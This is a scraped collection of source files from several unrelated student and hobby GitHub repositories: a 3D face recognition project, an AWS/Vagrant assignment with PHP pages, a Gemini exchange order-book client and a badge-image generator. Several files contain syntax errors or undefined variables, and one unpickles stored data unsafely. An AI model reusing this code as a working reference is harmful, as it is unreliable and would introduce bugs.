output_file):\n methods, rows, cols = matrix.shape\n output = []\n\n # Iterate each method\n for i in range(methods):\n if cols > 0:\n table = []\n table.append(\"<h1>Method %d</h1><table><tr><td></td>%s</tr>\" % (i, \"\\n\".join([ \"<td>%s</td>\" % faces[j][1] for j in range(cols) ])))\n\n for j in range(rows):\n table.append(\"<tr><td>%s</td>%s</tr>\" % (faces[j][1], \"\\n\".join([ \"<td>%s</td>\" % ((\"%.2f\" % matrix[(i, j, k)]) if not numpy.isnan(matrix[(i, j, k)]) else \"—\") for k in range(cols) ])))\n\n table.append(\"</table>\")\n output.append(\"\\n\".join(table))\n\n # Write table to file\n with open(output_file, \"w\") as f:\n f.write(\"\"\"\n <html>\n <head>\n <title>Similarity Matrix</title>\n </head>\n <body>\n %s\n </body>\n </html>\n \"\"\" % \"\\n\".join(output))\n\ndef generate_roc_curve(rocs, output_file):\n grey = (0.7, 0.7, 0.7, 0.7)\n figure = pyplot.figure()\n titles = [\"Euclidean\", \"City Block\", \"Correlation\"]\n legends = []\n plots = []\n index = 0\n\n # Draw ROC line\n subplot = pyplot.subplot(1, 1, 1)\n subplot.plot([0, 1], [1, 0], color=grey)\n\n # Plot each line\n for roc, eer in rocs:\n plots.extend(subplot.plot(roc[0], roc[1]))\n subplot.plot(eer, 1 - eer, 'x', color='r')\n\n # Include EER in legend\n legends.append(\"%s (EER=%.2f%%)\" % (titles[index], eer * 100))\n index = index + 1\n\n # Axis and legend\n subplot.set_xlabel('False positives rate')\n subplot.set_ylabel('True positives rate')\n subplot.legend(plots, legends, loc=4)\n\n # Save figure\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\nclass GeneratorLen(object):\n def __init__(self, gen, length):\n self.gen = gen\n self.length = length\n\n def __len__(self): \n return self.length\n\n def __iter__(self):\n return self.gen\n\n"
},
{
"alpha_fraction": 0.5931512713432312,
"alphanum_fraction": 0.5968202352523804,
"avg_line_length": 31.289474487304688,
"blob_id": "258337dcdc667d43a6c7acd793b63bc647c96877",
"content_id": "4f7f4683d346cdcbc80e9614915bd69539993b3a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2453,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 76,
"path": "/face3d/database.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom utils import GeneratorLen\n\nimport sqlite3\nimport cPickle\nimport cStringIO\nimport gzip\nimport threading\n\nclass Database(object):\n\n def __init__(self, path):\n self.lock = threading.Lock()\n self.connection = sqlite3.connect(path, check_same_thread=False)\n self.connection.execute(\"CREATE TABLE IF NOT EXISTS faces (filename TEXT, person_id TEXT, data BLOB);\")\n\n def flush(self):\n with self.lock:\n self.connection.execute(\"DELETE FROM faces;\")\n self.connection.commit()\n\n def exists(self, filename):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename FROM faces WHERE filename = ? LIMIT 1\", (filename, ))\n \n for row in cursor:\n return True\n\n return False\n\n def load(self, filename):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename, data FROM faces WHERE filename = ? LIMIT 1\", (filename, ))\n\n for filename, data in cursor:\n string_file = cStringIO.StringIO(data)\n try:\n return cPickle.load(gzip.GzipFile(fileobj=string_file, mode='rb'))\n except:\n return None\n\n def save(self, filename, person_id, data):\n # Serialize and compress data\n string_file = cStringIO.StringIO()\n\n with gzip.GzipFile(fileobj=string_file, mode='wb') as gzip_file:\n gzip_file.write(cPickle.dumps(data))\n\n # Create SQLite compatible data\n data = sqlite3.Binary(string_file.getvalue())\n\n # Insert data and commit\n with self.lock:\n self.connection.execute(\"INSERT INTO faces(filename, person_id, data) VALUES (?, ?, ?)\", (filename, person_id, data))\n self.connection.commit()\n \n def iterator(self):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename, person_id FROM faces ORDER BY person_id ASC\")\n rows = [ (filename, person_id) for filename, person_id, in cursor ]\n count = len(rows)\n\n def _generator():\n for (filename, person_id) in rows:\n f = self.load(filename)\n if f:\n yield (filename, person_id, f)\n\n return GeneratorLen(_generator(), count)"
},
{
"alpha_fraction": 0.7445651888847351,
"alphanum_fraction": 0.7618147730827332,
"avg_line_length": 61.25,
"blob_id": "7cf0d3239bf20240cde369df75ca76d97fa7dbe5",
"content_id": "94e7b2c9e762608b9cde3a23a965e4e0b5f5a338",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4232,
"license_type": "permissive",
"max_line_length": 511,
"num_lines": 68,
"path": "/README.md",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "# Face3D\nPrototype system for 3D Face Recognition built by Bas Stottelaar and Jeroen Senden for the course Introduction to Biometrics. Written in Python, applicable to the FRGC 3D data set.\n\n## Features\nThe following algorithms have been implemented:\n\n### Normalization\n* Smoothing\n* Interpolation\n* Cropping\n* Zooming\n* Key point extraction\n* Rotation\n\n### Feature extraction\nHistogram based, as proposed by Zhou et al. See http://www.3dface.org/files/papers/zhou-EG08-histogram-face-rec.pdf for more information.\n\n### Distance Metrics\n* Method 0: Euclidean Distance with threshold 0.9\n* Method 1: City Block Distance with threshold 0.9\n* Method 2: Sample Correlation Coefficient with threshold 0.9\n\n## Installation\nThe following dependencies are expected to be on your system\n\n* Python 2.7 (version 2.6 should work)\n* NumPy 1.6\n* SciPy 0.11\n* Matplotlib 1.2\n* SciKit-learn 0.12\n\nIn case of missing dependencies, they can be installed via the Python Packet Manager, via the command `pip install <name>`. \n\n## Quick Start\nA few examples to get started:\n\n* `python Face3D.py --enroll /path/to/abs/files --auto-id` — Enrolls all files in the folder and determines person identification based on filename.\n* `python Face3D.py --authenticate /path/to/file.abs` — Authenticate given file against the enrolled images. Will output the matches with scores.\n* `python Face3D.py --reevaluate --parameters N=48,K=12` — Reevaluate the data set with the given parameters. Does not save data, but you could visualize something with this data.\n\n## Usage\nFace3D is a commandline only application. Start a terminal and navigate to this directory where Face3D is extracted. Start the application with the command `python Face3D.py`.\n\n### General\n* `python Face3D.py --help` — Show help.\n* `python Face3D.py --parameters` — Comma seperated key-value parameters for the algorithms. Defaults (and only parameters supported) are `N=67,K=12`.\n* `python Face3D.py --database` — Specify the Face3D Database to work on. Default is `database.db`. You need to specify this option each time if you would like to use another database for operations below.\n\n### Face management\n* `python Face3D.py --enroll <file | directory> --person-id <id>|--auto-id` — Enroll a single file or a complete directory to the Face3D Database. Multiple threads will be spawned in case of multiple files. You have to specify a person ID. In case of auto ID, it will be derrived from the `*.abs` filename (xxxxxd123.abs). This process can take up to 15 minutes for 350+ faces on a Intel Core i7. If a face has already been enrolled, it will notify the user. Simply delete the database file to start over.\n* `python Face3D.py --authenticate <file>` — Match a given face to a face in the database.\n* `python Face3D.py --reevaluate` — Reevaluate the faces with another set of parameters. Works only for feature extraction and other calculations after feature extraction. This comes in handy when evaluating different parameters.\n\n### Visualization & Statistics\n* `python Face3D.py --depth-map <output.pdf> [--with-key-points]` — Write a 3D depth map of enrolled faces to a PDF file, with or without key points.\n* `python Face3D.py --feature-map <output.pdf>` — Write a feature map of enrolled faces to a PDF file. \n* `python Face3D.py --similarity-matrix <output.html>` — Write a similarity matrix to a HTML file.\n* `python Face3D.py --roc-curve <output.pdf>` — Write a ROC curve to a HTML file.\n\n## Source code\nThe main application logic is defined in `Face3D.py`. The rest of the code is stored in the folder `face3d/`.\n\nOne important file is `face3d/algorithms.py`. Here are all the algorithms programmed that are used for smoothing, interpolating, finding key points, cropping, feature extracting. Dependencies are `face3d/absfile.py` and `face3d/face.py`. The first reads `*.abs` files into memory and the second one is a wrapper for the data and handles views and compression. \n\nOn of the two files left is `face3d/database.py`, a wrapper for an SQLite3 database file. It reads and writes faces and features. Last but not least is `face3d/utils.py` as a place for common used methods.\n\n## Licence\nSee the LICENCE file."
}
] | 9 |
genericprogrammerguy/COSC349_Assignment_2 | https://github.com/genericprogrammerguy/COSC349_Assignment_2 | 16327cb7ba5f39b186e95cc733afdff5a8cc44d0 | a3ff09b57ecd64d6408077ae86bf168d02ca4c37 | ab557d94bc8531a49dfaea7dec65cdbc5dd43230 | refs/heads/master | 2022-03-03T12:12:34.721494 | 2019-10-07T10:16:19 | 2019-10-07T10:16:19 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6865671873092651,
"avg_line_length": 15.75,
"blob_id": "081b9c87f99540f9a8922de773c096d6c45b489f",
"content_id": "ee0921b11e5cba343922d173ea9f9891328be9fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 67,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 4,
"path": "/make_bucket.sh",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nmkdir ~/.aws\ncp -f credentials ~/.aws\npython3 paper.py\n"
},
{
"alpha_fraction": 0.6358381509780884,
"alphanum_fraction": 0.6647399067878723,
"avg_line_length": 14.454545021057129,
"blob_id": "9767a00cac02e524f0106636a7190e13dc1413ce",
"content_id": "5faa2c88ca7b4e8e820010ef62b4d7b7135c8593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 11,
"path": "/paper.py",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.client('s3')\n\npaper = s3.get_object(Bucket='orsum', Key='richard_seddon.txt')\n\nresponse = obj.get()\n\ndata = response['Body'].read()\n\nprint(data)\n\n\n\n"
},
{
"alpha_fraction": 0.6085653305053711,
"alphanum_fraction": 0.6376873850822449,
"avg_line_length": 22.816326141357422,
"blob_id": "8427c60915a65f72ab762130161dba690b45a68a",
"content_id": "e5876f4787118d8c88fa0f6dc41cfdf2e01ac9ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2335,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 98,
"path": "/www/indexSent.php",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">\n<html>\n<head><title>Database</title>\n<style>\nth { text-align: left; }\ntable, th, td {\nborder: 4px solid grey;\nborder-collapse: collapse;\n}\nth, td {\npadding: 0.2em;\ntext-align: right;\n}\n</style>\n\n\n</head>\n\n<body>\n<h1>Pass/Fail By Subject 2009-2011 at the University of Otago </h1>\n<!--- <b>Actual Data from OIA:<b><a href=\"https://fyi.org.nz/request/grade_breakdown_by_course_subjec_2\"> Click Here </a> -->\n<table>\n<input type=\"text\" id=\"searchTable\" onkeyup=\"search()\" placeholder=\"search\">\n\n<table border=\"1px solid black\" id=\"database2009\">\n<tr>\n<th>SUBJECT</th>\n<th>2009 PASS(%)</th>\n<th>2009 FAIL(%)</th>\n<th>2010 PASS(%)</th>\n<th>2010 FAIL(%)</th>\n<th>2011 PASS(%)</th>\n<th>2011 FAIL(%)</th>\n<tr>\n\n<?php include \"../inc/dbinfo.inc\"; ?>\n<?php\n\n/* Connect to MySQL and select the database. */\n$connection = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD);\n\n\nif (mysqli_connect_errno()) echo \"Failed to connect to MySQL: \" . mysqli_connect_error();\n\n/* $database = mysqli_select_db($connection, DB_DATABASE);*/\n\n/* Ensure that the EMPLOYEES table exists. */\n/*VerifyPapersTable($connection, DB_DATABASE);\n\n$pdo = new PDO(DB_SERVER, DB_USERNAME, DB_PASSWORD);*/\n$result = mysqli_query($connection, \"SELECT * FROM database2009.papers\");\nwhile($row = mysqli_fetch_row($result)){\necho \"<tr>\";\necho \"<td>\",$row[0], \"</td>\",\n\"<td>\",$row[1], \"</td>\",\n\"<td>\",$row[2], \"</td>\",\n\"<td>\",$row[3], \"</td>\",\n\"<td>\",$row[4], \"</td>\", \n\"<td>\",$row[5], \"</td>\", \n\"<td>\",$row[6], \"</td>\", \necho \"</tr>\";\n};\n\n?>\n<?php\n</table>\n\n<script>\nfunction search() {\nvar input, filter, table, tr, td, i, txtValue, url;\ninput = document.getElementById(\"database2009\");\nfilter = input.value.toUpperCase();\n\ntable = document.getElementById(\"search\");\ntr = table.getElementsByTagName(\"tr\");\n\n// Loop through all table rows, and hide those who don't match the search query\nfor (i = 0; i < tr.length; i++) {\ntd = tr[i].getElementsByTagName(\"td\")[0];\nif (td) {\ntxtValue = td.textContent || td.innerText;\nif (txtValue.toUpperCase().indexOf(filter) > -1) {\ntr[i].style.display = \"\";\n} else {\ntr[i].style.display = \"none\";\n}\n} \n}\n}\n</script>\n?> \n<p>(i) Excludes subject/level combinations with fewer than 10 enrolments.</p/n>\n<p>(ii) Excludes papers at 400-level and above.</p>\n\n<h3>Notes:</h3> \n\n</body>\n</html>\n\n"
},
{
"alpha_fraction": 0.6069958806037903,
"alphanum_fraction": 0.6373456716537476,
"avg_line_length": 28.014925003051758,
"blob_id": "02a84966929a44cadb2d6714feb03996e4426d0e",
"content_id": "b5bd7bde8d8af9732068a583591ad2e496ba29d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 3888,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 134,
"path": "/Vagrantfile",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# For a complete reference, please see the online documentation at\n# https://docs.vagrantup.com.\n\n# Every Vagrant development environment requires a box. You can search for\n# boxes at https://vagrantcloud.com/search.\n\nVagrant.configure(\"2\") do |config|\n\n config.vm.box = \"dummy\"\n\n config.vm.define 'web' do |web|\n web.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"web\"}\n\n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n\n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n web.vm.provision \"shell\", inline: <<-SHELL\n apt-get update\n apt-get install -y apache2 php libapache2-mod-php php-mysql\n cp -f /vagrant/www/index.php /var/www/html\n a2ensite www/index.php\n a2dissite 000-default\n service apache2 reload\n SHELL\n end\n \n config.vm.define 'database' do |database|\n database.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"database\"}\n\n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n \n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n database.vm.provision \"shell\", inline: <<-SHELL\n SHELL\n end\n\n config.vm.define 'paper' do |paper|\n paper.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"paper\"}\n \n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n \n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n paper.vm.provision \"shell\", inline: <<-SHELL\n #apt-get update\n #apt install -y python3-pip awscli\n #export LC_ALL=\"en_US.UTF-8\"\n #pip3 install boto3\n #su -c \"echo 'runnning shell script make_buket'; ./make_bucket.sh\" ubuntu\n SHELL\n end\nend\n"
},
{
"alpha_fraction": 0.64673912525177,
"alphanum_fraction": 0.6739130616188049,
"avg_line_length": 21.75,
"blob_id": "93fbb5ee7bd0de7ab5bdb5c75d4dc1a3f2ac5e55",
"content_id": "bfe8249dcdc92598b335b54136368192d571f6b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 8,
"path": "/updated-paper.py",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "import urllib3.request\n\nhttp = urllib3.PoolManager()\n\nr = http.request('GET', 'https://orsum.s3.amazonaws.com/database-2.csv')\n\nwith open('database-2.csv', 'w') as w:\n f.write(r)\n\n\n"
},
{
"alpha_fraction": 0.5381041169166565,
"alphanum_fraction": 0.5566914677619934,
"avg_line_length": 24.619047164916992,
"blob_id": "c83ee91d450d991a23b1d2c7a8856ba0165399a3",
"content_id": "70ed7a8b0cd56f01d813b888c0cbc71c2dab0b1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 42,
"path": "/www/index.php",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">\n<html>\n <head><title>Database</title>\n <style>\n th { text-align: left; }\n table, th, td {\n border: 4px solid grey;\n border-collapse: collapse;\n }\n th, td {\n padding: 0.2em;\n text-align: right;\n }\n </style>\n \n \n </head>\n\n <body>\n <h1>Pass/Fail By Subject 2009-2011 at the University of Otago </h1>\n <?php\n $excelFile = realpath('database-2.xls');\n $excelDir = dirname($excelFile);\n $connection = odbc_connect(\"Driver={Microsoft Excel Driver (*.xls)};DriverId=790;Dbq=$excelFile;DefaultDir=$excelDir\" , '', '');\n\n <!-- add more fields -->\n $sqlQuery = \"SELECT PaperSubject FROM Main\";\n\n $results = odbc_exec($connectionString, $sqlQuery);\n\n <!-- add more outputs -->\n while(odbc_fetch_row($results)){ $output1 = odbc_result($results, 1); }\n\n <!-- do stuff with the outputs -->\n print(“Excel Data”); print(\"$output1 \"); print(“”);\n\n odbc_close($connectionString);\n\n ?>\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.5408163070678711,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 23.5,
"blob_id": "3cb21510c41df3d54279cec3f3748e15c43069b9",
"content_id": "d2faceb146edf4e46f67837b9bfa82ff2183a885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/setup-2.sql",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "CREATE DATABASE database2012;\nUSE database2012;\n\n\nCREATE TABLE new_papers (\n subject varchar(40) NOT NULL,\n y2012 varchar(3) NOT NULL,\n y2013 varchar(3) NOT NULL,\n y2014 varchar(3) NOT NULL,\n y2015 varchar(3) NOT NULL,\n y2016 varchar(3) NOT NULL,\n y2017 varchar(3) NOT NULL,\n y2018 varchar(3) NOT NULL,\n\n PRIMARY KEY (subject)\n\n);\n\nLOAD DATA LOCAL INFILE '~/349/COSC_Assignment_2/database.csv'\nINTO TABLE new_papers\nFIELDS TERMINATED BY ','\nLINES TERMINATED BY '\\n'\nIGNORE 1 ROWS\n(subject, y2012,y2013,y2014,y2015,y2016,y2017,y2018);\n"
}
] | 7 |
mattpearson/GeminiBook | https://github.com/mattpearson/GeminiBook | a1f6d537ee67139d3b14c0fcd84d24ae9e37e42a | bba80a5b4407560a9d8a1c313e0a2b550664784e | 8c2b7371eaedf523d7993ce805f255403fb4ae9d | refs/heads/master | 2020-12-02T09:55:11.056180 | 2017-07-09T04:17:27 | 2017-07-09T04:17:27 | 96,660,502 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8444444537162781,
"alphanum_fraction": 0.8444444537162781,
"avg_line_length": 44,
"blob_id": "43fe0ec08760c2f619f26475c8ba9be04fba6239",
"content_id": "47a07b07a51cb8a0f21f70fc5aa021ff8f86f348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "mattpearson/GeminiBook",
"src_encoding": "UTF-8",
"text": "# GeminiBook\nGemini Exchange marketdata depth of book creation using websockets in python\n"
},
{
"alpha_fraction": 0.4737074673175812,
"alphanum_fraction": 0.4790101647377014,
"avg_line_length": 22.57291603088379,
"blob_id": "ec768e2f0ba97f381d475a8333cda1314f610c46",
"content_id": "4ded7e391b9177e510a99a838eae38f9a7a8e054",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2263,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 96,
"path": "/gemini.py",
"repo_name": "mattpearson/GeminiBook",
"src_encoding": "UTF-8",
"text": "# vim:sw=4:nu:expandtab:tabstop=4:ai\n\nimport websocket\nimport thread\nimport time\nimport json\n\nclass level():\n def __init__( self, price, qty ):\n self.price = price\n self.qty = qty\n pass\n def set( price, qty ):\n self.price = price\n self.qty = qty\n\nclass GeminiBook:\n def __init__(self):\n self.bids = {}\n self.offers = {}\n\n\ndef printBook( inside = True ):\n if( inside ):\n bestbid = max( gemini.bids )\n bestask = min( gemini.offers )\n\n str = ''\n\n bb = gemini.bids[ bestbid ]\n if( bb ):\n str = '%.2f (%.2f) || ' % ( bb.price, bb.qty )\n\n ba = gemini.offers[ bestask ]\n if( ba ):\n str = str + '%.2f (%.2f)' % ( ba.price, ba.qty )\n\n print str\n\n else:\n print 'full depth printing not yet supported.'\n pass\n\n\ndef on_message(ws, message):\n #print('Received: ', message)\n\n j = json.loads( message )\n\n events = j['events']\n for r in range( len( events ) ):\n e = events[r]\n\n try:\n side = e['side']\n price = float(e['price'])\n qty = float(e['remaining'])\n if( side == u'ask'):\n if( qty == 0 ):\n gemini.offers.pop( price, None )\n else:\n gemini.offers[ price ] = level( price, qty )\n if( side == u'bid'):\n if( qty == 0 ):\n gemini.bids.pop( price, None )\n else:\n gemini.bids[ price ] = level( price, qty )\n except Exception, err:\n print 'Error: %s %s' % ( err, e )\n printBook()\n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### closed ###\")\n\ndef on_open(ws):\n def run(*args):\n while( True ):\n time.sleep(100)\n ws.close()\n print(\"thread terminating...\")\n thread.start_new_thread(run, ())\n\n\nif __name__ == \"__main__\":\n gemini = GeminiBook()\n\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(\"wss://api.gemini.com/v1/marketdata/ethusd\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()\n"
}
] | 2 |
1337GAK/Conference-Badge-Creator | https://github.com/1337GAK/Conference-Badge-Creator | 0c9786996881353442fb6498a1dbdad3dbfb737b | bf67aa6d9ca833d71c226176099e8a8ae03d9e12 | 12d475828b44fc198213565f4437137e1d6c3c02 | refs/heads/master | 2021-05-04T07:31:26.254750 | 2017-10-31T21:00:06 | 2017-10-31T21:00:06 | 70,632,957 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5319364070892334,
"alphanum_fraction": 0.5523121356964111,
"avg_line_length": 40.43712615966797,
"blob_id": "797be14caf684dd937bdcf12a709c06200a233fe",
"content_id": "f01070ac1be3963adf380d60f210d118ad0c7962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6996,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 167,
"path": "/dictTextToImage.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom excelParse import *\n\nfrom PIL import ImageFont\nfrom PIL import Image\nfrom PIL import ImageDraw\n\nimport os\nimport os.path\nfrom os import mkdir\n\nImage.init()\nImage.SAVE.keys()\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nMAIN_FONT = \"C:/Windows/Fonts/GOTHICB.ttf\"\nMAIN_FONT_SIZE = 85\nOCCUPATIONS_FONT = \"C:/Windows/Fonts/Cocomat Light-trial.ttf\"\nOCCUPATIONS_FONT_SIZE = 0.75 * float(MAIN_FONT_SIZE)\nUNIVERSITIES_FONT = \"C:/Windows/Fonts/GOTHICI.TTF\"\nUNIVERSITIES_FONT_SIZE = OCCUPATIONS_FONT_SIZE\n\nEXCESS_FONT_SIZE = 65\n\ndef initialize_occupation_directories(occupations, size):\n read = False\n for i in range(size):\n if not read:\n if not os.path.exists(\"Badges Wave 2016\"):\n mkdir(\"Badges Wave 2016\")\n os.chdir(\"Badges Wave 2016\")\n read = True\n if group:\n for j in range(0, len(occupations)):\n if not os.path.exists(occupations[j]):\n mkdir(occupations[j])\n else:\n if not os.path.exists(\"Occupations\"):\n mkdir(\"Occupations\")\n\ndef draw_data_to_img(img, name, surname, occupation, university):\n # Values and offsets modified through trial and error\n\n ######################### HACKS TO FIT TEXT PROPERLY TO TEMPLATE ####################################\n\n # pad for proper styling on template\n name_xpad = 63\n name_ypad = 750\n\n surname_xpad = name_xpad\n surname_ypad = name_ypad + 85\n\n occupation_xpad = name_xpad\n occupation_ypad = 1010\n\n university_xpad = name_xpad\n university_ypad = 1110\n \n ############# Adjust sizes so that text doesnt spill from black box\n name_font = ImageFont.truetype(MAIN_FONT, MAIN_FONT_SIZE)\n if len(name) > 10:\n name_font = ImageFont.truetype(MAIN_FONT, EXCESS_FONT_SIZE)\n name_ypad += 10\n\n surname_font = ImageFont.truetype(MAIN_FONT, MAIN_FONT_SIZE)\n if len(surname) > 10:\n surname_font = ImageFont.truetype(MAIN_FONT, EXCESS_FONT_SIZE)\n surname_ypad += 20\n\n occupation_font = ImageFont.truetype(OCCUPATIONS_FONT,int(OCCUPATIONS_FONT_SIZE))\n if len(occupation) > 25:\n OCCUPATIONS_FONT_SIZE = 0.63 * float(OCCUPATIONS_FONT_SIZE)\n occupation_xpad = 55\n occupation_ypad += 5\n elif len(occupation) > 20:\n OCCUPATIONS_FONT_SIZE = 0.76 * float(OCCUPATIONS_FONT_SIZE)\n\n if university!='0':\n university_nl = university\n uni_words = university.split()\n if university == \"THE AMERICAN COLLEGE OF THESSALONIKI\":\n university_nl = \"THE AMERICAN\\nCOLLEGE OF\\nTHESSALONIKI\"\n elif len(university)>50:\n university_nl = u\"ΕΘΝΙΚΟ ΚΑΙ\\nΚΑΠΟΔΙΣΤΡΙΑΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ\\nΑΘΗΝΩΝ/ΑΡΙΣΤΟΤΕΛΕΙΟ\\nΠΑΝΕΠΙΣΤΗΜΙΟ ΘΕΣΣΑΛΟΝΙΚΗΣ\"\n size_uni_font = 0.70 * float(size_uni_font)\n elif len(university) > 40:\n university_nl = uni_words[0],uni_words[1]+\"\\n\"+uni_words[2],uni_words[3]+\"\\n\"+uni_words[4]\n size_uni_font = 0.75 * float(size_uni_font)\n elif len(university)>10:\n university_nl = university[:10]+university[10:].replace(\" \",\"\\n\")\n if not group and len(university)<12:\n size_uni_font = 1.75 * float(size_uni_font)\n uni_font = ImageFont.truetype(UNIVERSITIES_FONT, int(size_uni_font))\n\n ######################### END OF HACKS ####################################\n\n draw = ImageDraw.Draw(img)\n draw.text((name_xpad, name_ypad), name, white, name_font)\n draw.text((surname_xpad, surname_ypad), surname, white, surname_font)\n draw.text((x_pad, occupation_y_pad), occupation, black, OCCUPATIONS_FONT\n draw.text((x_pad+1, occupation_y_pad), occupation, black, OCCUPATIONS_FONT) # Simulate bold with +1 offset\n if university != '0':\n draw.text((x_pad, uni_y_pad), university_nl, black, uni_font)\n\ndef save_image(img, fname, occupation, occupations, group, action)\n # Save each file to corresponding directory\n scriptdir = os.getcwd()\n if group:\n for k in range(len(occupations)):\n if occupation == occupations[k]:\n path = os.path.join(scriptdir, occupations[k]) # Dir/Occupation\n path = os.path.join(path, fname)\n if action == 1: # overwrite mode\n 